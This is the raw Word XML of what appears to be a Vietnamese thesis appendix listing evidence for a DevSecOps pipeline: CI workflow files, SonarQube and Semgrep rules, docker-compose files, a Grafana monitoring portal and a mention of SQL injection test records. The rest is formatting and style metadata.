          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Taint Analysis and Semantic Code Search Engine for Modern Application Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Semgrep Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Grafana Labs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Loki: Like Prometheus, but for Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Grafana Observability Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>PHỤ LỤC: HỒ SƠ MINH CHỨNG THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>(Hội đồng thẩm định và quý độc giả có thể tham chiếu trực tiếp các minh chứng kỹ thuật tương ứng trong kho mã nguồn và hệ thống thực nghiệm)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Minh chứng 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bản ghi thực thi thành công 4 giai đoạn tự động trên GitHub Actions Workflow (tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>.github/workflows/devsecops-pipeline.yml</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2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bộ quy tắc kiểm soát chính sách phân nhánh và kiểm tra cú pháp commit (mã nguồn tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/policy_guard.py</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3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bảng cấu hình ngưỡng chặn chất lượng SonarQube Quality Gate Rating A (đặc tả tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube-quality-gate.json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4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bộ quy tắc nhận diện luồng dữ liệu ô nhiễm tùy biến địa phương (đặc tả tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/semgrep-local-rules.yml</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5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bộ kiểm tra thẩm định cấu hình hạ tầng 21/21 test cases (mã nguồn tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/validate_configs.py</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6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tệp điều phối triển khai sản xuất bảo toàn dữ liệu MariaDB (đặc tả tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</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7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tệp điều phối hạ tầng giám sát tập trung bền vững 24/7 (đặc tả tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.monitoring.yml</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8:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hồ sơ thực nghiệm chi tiết và mã khai thác thực tế của 14 vector tấn công SQL Injection trên hệ thống InlaneWeb Logistics Portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Minh chứng 9:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cổng giám sát an ninh tập trung trực tuyến thời gian thực: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://grafana.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Bảo mật qua xác thực tài khoản quản trị viên, vô hiệu hóa hoàn toàn Anonymous Access).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Minh chứng 10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiến trúc điều phối mạng Docker nội bộ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và cơ chế định tuyến Reverse Proxy Nginx Proxy Manager đa cổng độc lập.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A554DB" w:rsidRPr="00AE47E8" w:rsidSect="008425EB">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1134" w:right="1021" w:bottom="1134" w:left="1418" w:header="340" w:footer="3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D648516" w14:textId="77777777" w:rsidR="004458FF" w:rsidRDefault="004458FF" w:rsidP="00A16434">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="46027076" w14:textId="77777777" w:rsidR="004458FF" w:rsidRDefault="004458FF"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4BD4C8" w14:textId="61122DCC" w:rsidR="00C202B1" w:rsidRDefault="00C202B1"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5053F" w14:textId="1A9C6142" w:rsidR="00C202B1" w:rsidRDefault="00C202B1">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0541CA" w14:textId="77777777" w:rsidR="004458FF" w:rsidRDefault="004458FF" w:rsidP="00A16434">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1705885E" w14:textId="77777777" w:rsidR="004458FF" w:rsidRDefault="004458FF"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F6263B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D047230"/>
    <w:lvl w:ilvl="0" w:tplc="012C6CF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="CTDT-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F24BAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D24C4924"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-H1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHƯƠNG %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-H2"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-H3"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold" w:hint="default"/>
        <w:b/>
        <w:i/>
        <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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3F66528"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="063EC6E8"/>
    <w:lvl w:ilvl="0" w:tplc="500EA810">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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6EE5F57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F14492E"/>
    <w:lvl w:ilvl="0" w:tplc="E28A4E1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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49E92297"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66B8106E"/>
    <w:lvl w:ilvl="0" w:tplc="DAEE6B80">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="CTDT-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D5D2151"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2474D7A4"/>
    <w:lvl w:ilvl="0" w:tplc="1AC09B28">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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0683F93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F141D2E"/>
    <w:lvl w:ilvl="0" w:tplc="CA247B8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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757F53DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3E4E4CC"/>
    <w:lvl w:ilvl="0" w:tplc="AEF200F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CTDT-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abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="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bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter/>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3B"/>
    <w:rsid w:val="000043B2"/>
    <w:rsid w:val="00011D65"/>
    <w:rsid w:val="00011DC2"/>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24AE"/>
    <w:rsid w:val="00053898"/>
    <w:rsid w:val="00054B5D"/>
    <w:rsid w:val="000552A0"/>
    <w:rsid w:val="00057547"/>
    <w:rsid w:val="00063B63"/>
    <w:rsid w:val="0006405F"/>
    <w:rsid w:val="000716CB"/>
    <w:rsid w:val="000718FF"/>
    <w:rsid w:val="00075007"/>
    <w:rsid w:val="00075B0B"/>
    <w:rsid w:val="0008072E"/>
    <w:rsid w:val="00080A3A"/>
    <w:rsid w:val="000838FA"/>
    <w:rsid w:val="00086134"/>
    <w:rsid w:val="00086322"/>
    <w:rsid w:val="0008742B"/>
    <w:rsid w:val="00087435"/>
    <w:rsid w:val="00090C14"/>
    <w:rsid w:val="000A3279"/>
    <w:rsid w:val="000A5770"/>
    <w:rsid w:val="000A6D26"/>
    <w:rsid w:val="000B2BB2"/>
    <w:rsid w:val="000B5005"/>
    <w:rsid w:val="000B7A59"/>
    <w:rsid w:val="000C0F0C"/>
    <w:rsid w:val="000C1CA1"/>
    <w:rsid w:val="000C2282"/>
    <w:rsid w:val="000C2C39"/>
    <w:rsid w:val="000C5FCD"/>
    <w:rsid w:val="000C636E"/>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D78"/>
    <w:rsid w:val="0016218E"/>
    <w:rsid w:val="00162235"/>
    <w:rsid w:val="00162308"/>
    <w:rsid w:val="001633C1"/>
    <w:rsid w:val="00163C03"/>
    <w:rsid w:val="00164A69"/>
    <w:rsid w:val="001724A1"/>
    <w:rsid w:val="001738F3"/>
    <w:rsid w:val="001752CF"/>
    <w:rsid w:val="001761C1"/>
    <w:rsid w:val="001776C5"/>
    <w:rsid w:val="00180445"/>
    <w:rsid w:val="00186891"/>
    <w:rsid w:val="001873CF"/>
    <w:rsid w:val="00187C76"/>
    <w:rsid w:val="00191626"/>
    <w:rsid w:val="00195D66"/>
    <w:rsid w:val="001A136C"/>
    <w:rsid w:val="001A3927"/>
    <w:rsid w:val="001B13DE"/>
    <w:rsid w:val="001B38C4"/>
    <w:rsid w:val="001B6469"/>
    <w:rsid w:val="001B660F"/>
    <w:rsid w:val="001C0245"/>
    <w:rsid w:val="001C187F"/>
    <w:rsid w:val="001C20DD"/>
    <w:rsid w:val="001C5E9E"/>
    <w:rsid w:val="001D31C7"/>
    <w:rsid w:val="001D5EA4"/>
    <w:rsid w:val="001D709B"/>
    <w:rsid w:val="001E2F27"/>
    <w:rsid w:val="001E589E"/>
    <w:rsid w:val="001F4805"/>
    <w:rsid w:val="001F79EC"/>
    <w:rsid w:val="001F7AE9"/>
    <w:rsid w:val="00200717"/>
    <w:rsid w:val="00201ABF"/>
    <w:rsid w:val="00202AA8"/>
    <w:rsid w:val="002036A6"/>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5E7A"/>
    <w:rsid w:val="00346BE4"/>
    <w:rsid w:val="0034711E"/>
    <w:rsid w:val="00354E72"/>
    <w:rsid w:val="00355B67"/>
    <w:rsid w:val="003563E0"/>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3924"/>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58FF"/>
    <w:rsid w:val="00447ECA"/>
    <w:rsid w:val="004516AE"/>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28F5"/>
    <w:rsid w:val="00482D7E"/>
    <w:rsid w:val="004848B6"/>
    <w:rsid w:val="00485F86"/>
    <w:rsid w:val="00490B98"/>
    <w:rsid w:val="00495E35"/>
    <w:rsid w:val="00496045"/>
    <w:rsid w:val="004A5228"/>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6961"/>
    <w:rsid w:val="00516A6C"/>
    <w:rsid w:val="005175BE"/>
    <w:rsid w:val="0052070B"/>
    <w:rsid w:val="00527793"/>
    <w:rsid w:val="00527A49"/>
    <w:rsid w:val="00530A90"/>
    <w:rsid w:val="0053281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B72"/>
    <w:rsid w:val="005D042F"/>
    <w:rsid w:val="005D1EFA"/>
    <w:rsid w:val="005D7173"/>
    <w:rsid w:val="005F1377"/>
    <w:rsid w:val="005F43EE"/>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35D1E"/>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3E60"/>
    <w:rsid w:val="006C3F4D"/>
    <w:rsid w:val="006D099F"/>
    <w:rsid w:val="006D530E"/>
    <w:rsid w:val="006D5FCE"/>
    <w:rsid w:val="006E0378"/>
    <w:rsid w:val="006E1517"/>
    <w:rsid w:val="006E494B"/>
    <w:rsid w:val="006E6149"/>
    <w:rsid w:val="006E70F6"/>
    <w:rsid w:val="006E7DFC"/>
    <w:rsid w:val="006F264B"/>
    <w:rsid w:val="006F5CD9"/>
    <w:rsid w:val="00701E8A"/>
    <w:rsid w:val="00704135"/>
    <w:rsid w:val="00704F00"/>
    <w:rsid w:val="00706FA7"/>
    <w:rsid w:val="00713C3E"/>
    <w:rsid w:val="00714095"/>
    <w:rsid w:val="007154F5"/>
    <w:rsid w:val="007158D0"/>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6BC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802AF6"/>
    <w:rsid w:val="00805F8A"/>
    <w:rsid w:val="0081021E"/>
    <w:rsid w:val="00811E89"/>
    <w:rsid w:val="008121BD"/>
    <w:rsid w:val="008125A3"/>
    <w:rsid w:val="00812772"/>
    <w:rsid w:val="008154E0"/>
    <w:rsid w:val="00816122"/>
    <w:rsid w:val="00822162"/>
    <w:rsid w:val="0082393A"/>
    <w:rsid w:val="00823C5F"/>
    <w:rsid w:val="00824B01"/>
    <w:rsid w:val="00825CAB"/>
    <w:rsid w:val="00832355"/>
    <w:rsid w:val="008334C5"/>
    <w:rsid w:val="00833C69"/>
    <w:rsid w:val="00834B3E"/>
    <w:rsid w:val="00835BBD"/>
    <w:rsid w:val="008378E1"/>
    <w:rsid w:val="00840A06"/>
    <w:rsid w:val="00842318"/>
    <w:rsid w:val="008425EB"/>
    <w:rsid w:val="00842E33"/>
    <w:rsid w:val="008450C8"/>
    <w:rsid w:val="00846803"/>
    <w:rsid w:val="008519E2"/>
    <w:rsid w:val="00862776"/>
    <w:rsid w:val="008650E8"/>
    <w:rsid w:val="00865D55"/>
    <w:rsid w:val="00866B27"/>
    <w:rsid w:val="0087247A"/>
    <w:rsid w:val="0087561D"/>
    <w:rsid w:val="00880155"/>
    <w:rsid w:val="00880E94"/>
    <w:rsid w:val="008830A9"/>
    <w:rsid w:val="00887A04"/>
    <w:rsid w:val="0089181B"/>
    <w:rsid w:val="00891C98"/>
    <w:rsid w:val="008931B1"/>
    <w:rsid w:val="00896A1E"/>
    <w:rsid w:val="00896DC6"/>
    <w:rsid w:val="00896EA1"/>
    <w:rsid w:val="008A0326"/>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3F26"/>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76D4"/>
    <w:rsid w:val="009138E3"/>
    <w:rsid w:val="00923891"/>
    <w:rsid w:val="00924C29"/>
    <w:rsid w:val="00927DC7"/>
    <w:rsid w:val="00940BA8"/>
    <w:rsid w:val="00942225"/>
    <w:rsid w:val="00944A4D"/>
    <w:rsid w:val="00944ECE"/>
    <w:rsid w:val="0094515A"/>
    <w:rsid w:val="00946FBC"/>
    <w:rsid w:val="0095257D"/>
    <w:rsid w:val="00952898"/>
    <w:rsid w:val="009557DC"/>
    <w:rsid w:val="0095775E"/>
    <w:rsid w:val="00972DC3"/>
    <w:rsid w:val="00973D9A"/>
    <w:rsid w:val="0098045A"/>
    <w:rsid w:val="009812BD"/>
    <w:rsid w:val="009823B5"/>
    <w:rsid w:val="009827A5"/>
    <w:rsid w:val="0098409A"/>
    <w:rsid w:val="009927F8"/>
    <w:rsid w:val="009950E2"/>
    <w:rsid w:val="00997ADC"/>
    <w:rsid w:val="00997F39"/>
    <w:rsid w:val="009A62C9"/>
    <w:rsid w:val="009B31A2"/>
    <w:rsid w:val="009B4806"/>
    <w:rsid w:val="009C0DAC"/>
    <w:rsid w:val="009C11C5"/>
    <w:rsid w:val="009C202D"/>
    <w:rsid w:val="009C42F0"/>
    <w:rsid w:val="009C5C37"/>
    <w:rsid w:val="009D2D49"/>
    <w:rsid w:val="009D6642"/>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6C93"/>
    <w:rsid w:val="00A76FFE"/>
    <w:rsid w:val="00A813BB"/>
    <w:rsid w:val="00A96269"/>
    <w:rsid w:val="00AA34C6"/>
    <w:rsid w:val="00AB1A86"/>
    <w:rsid w:val="00AB25EE"/>
    <w:rsid w:val="00AC18AC"/>
    <w:rsid w:val="00AC5A72"/>
    <w:rsid w:val="00AD5191"/>
    <w:rsid w:val="00AE00B8"/>
    <w:rsid w:val="00AE47E8"/>
    <w:rsid w:val="00AE6801"/>
    <w:rsid w:val="00AE7037"/>
    <w:rsid w:val="00AF0AE6"/>
    <w:rsid w:val="00AF364B"/>
    <w:rsid w:val="00AF6873"/>
    <w:rsid w:val="00B02083"/>
    <w:rsid w:val="00B0324F"/>
    <w:rsid w:val="00B03F2E"/>
    <w:rsid w:val="00B0418C"/>
    <w:rsid w:val="00B10152"/>
    <w:rsid w:val="00B10FD9"/>
    <w:rsid w:val="00B1231E"/>
    <w:rsid w:val="00B126A9"/>
    <w:rsid w:val="00B1553B"/>
    <w:rsid w:val="00B23D86"/>
    <w:rsid w:val="00B25B86"/>
    <w:rsid w:val="00B27D75"/>
    <w:rsid w:val="00B300D2"/>
    <w:rsid w:val="00B30C2C"/>
    <w:rsid w:val="00B310DB"/>
    <w:rsid w:val="00B316A5"/>
    <w:rsid w:val="00B330A1"/>
    <w:rsid w:val="00B36CFD"/>
    <w:rsid w:val="00B42A39"/>
    <w:rsid w:val="00B44C28"/>
    <w:rsid w:val="00B50208"/>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705E"/>
    <w:rsid w:val="00B97AE3"/>
    <w:rsid w:val="00BA1AD9"/>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975C1"/>
    <w:rsid w:val="00CA3A27"/>
    <w:rsid w:val="00CB0261"/>
    <w:rsid w:val="00CB1962"/>
    <w:rsid w:val="00CB6336"/>
    <w:rsid w:val="00CB7158"/>
    <w:rsid w:val="00CC5547"/>
    <w:rsid w:val="00CC6C42"/>
    <w:rsid w:val="00CD419D"/>
    <w:rsid w:val="00CE3558"/>
    <w:rsid w:val="00CE3CED"/>
    <w:rsid w:val="00CE45C3"/>
    <w:rsid w:val="00CE7708"/>
    <w:rsid w:val="00CF3033"/>
    <w:rsid w:val="00CF5D69"/>
    <w:rsid w:val="00CF6523"/>
    <w:rsid w:val="00CF7EF4"/>
    <w:rsid w:val="00D0000A"/>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3DF5"/>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4366"/>
    <w:rsid w:val="00DA7520"/>
    <w:rsid w:val="00DB33E4"/>
    <w:rsid w:val="00DB3828"/>
    <w:rsid w:val="00DB66EF"/>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B06E2"/>
    <w:rsid w:val="00EB38B4"/>
    <w:rsid w:val="00EB5197"/>
    <w:rsid w:val="00EB7946"/>
    <w:rsid w:val="00EC11B4"/>
    <w:rsid w:val="00EC348F"/>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03E89"/>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B4622"/>
    <w:rsid w:val="00FB707B"/>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DFC"/>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CTDT-Text">
    <w:name w:val="CTDT-Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CTDT-TextChar"/>
    <w:qFormat/>
    <w:rsid w:val="00D43DF5"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
      <w:ind w:firstLine="454"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Bullet1">
    <w:name w:val="CTDT-Bullet1"/>
    <w:basedOn w:val="CTDT-Text"/>
    <w:link w:val="CTDT-Bullet1Char"/>
    <w:qFormat/>
    <w:rsid w:val="0056021B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:left="340" w:hanging="340"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-TextChar">
    <w:name w:val="CTDT-Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CTDT-Text"/>
    <w:rsid w:val="00D43DF5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CTDT-Number">
    <w:name w:val="CTDT-Number"/>
    <w:basedOn w:val="CTDT-Bullet1"/>
    <w:link w:val="CTDT-NumberChar"/>
    <w:qFormat/>
    <w:rsid w:val="00260AB5"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CTDT-Bullet1Char">
    <w:name w:val="CTDT-Bullet1 Char"/>
    <w:basedOn w:val="CTDT-TextChar"/>
    <w:link w:val="CTDT-Bullet1"/>
    <w:rsid w:val="0056021B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
